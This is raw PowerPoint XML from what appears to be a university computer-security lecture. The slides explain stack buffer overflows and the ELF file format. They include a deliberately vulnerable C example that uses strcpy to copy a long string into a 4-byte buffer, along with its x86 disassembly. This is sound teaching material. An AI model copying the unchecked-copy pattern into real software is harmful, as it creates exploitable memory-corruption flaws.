        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436243" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is copied without checking boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a pre-allocated buffer and overwrites the return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>address (or other parts of the frame)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally this causes a segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly crafted, it is possible overwrite the return address with a user-defined value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to cause a jump to user-defined code (e.g., code that invokes a shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code may be part of the overflowing data (or not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code will be executed with the privileges of the running program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68603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6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6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6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6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6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6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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saved EBP and saved EIP are stored on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What prevents a program/function from writing/changing those values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What would happen if they did?</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148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147790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4" y="305134"/>
            <a:ext cx="4229810" cy="5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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main</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mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="29782"/>
            <a:ext cx="5832763"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900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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push </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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x28,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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0x8(</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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lea -0xc(</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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent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leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="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ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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push </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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x8048504,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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$0x8048517,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent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$0x0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</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leave</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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136379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21" end="21"/>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22" end="22"/>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2400300"/>
            <a:ext cx="1676400" cy="5715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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995332" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2971800"/>
            <a:ext cx="1676400" cy="8001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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
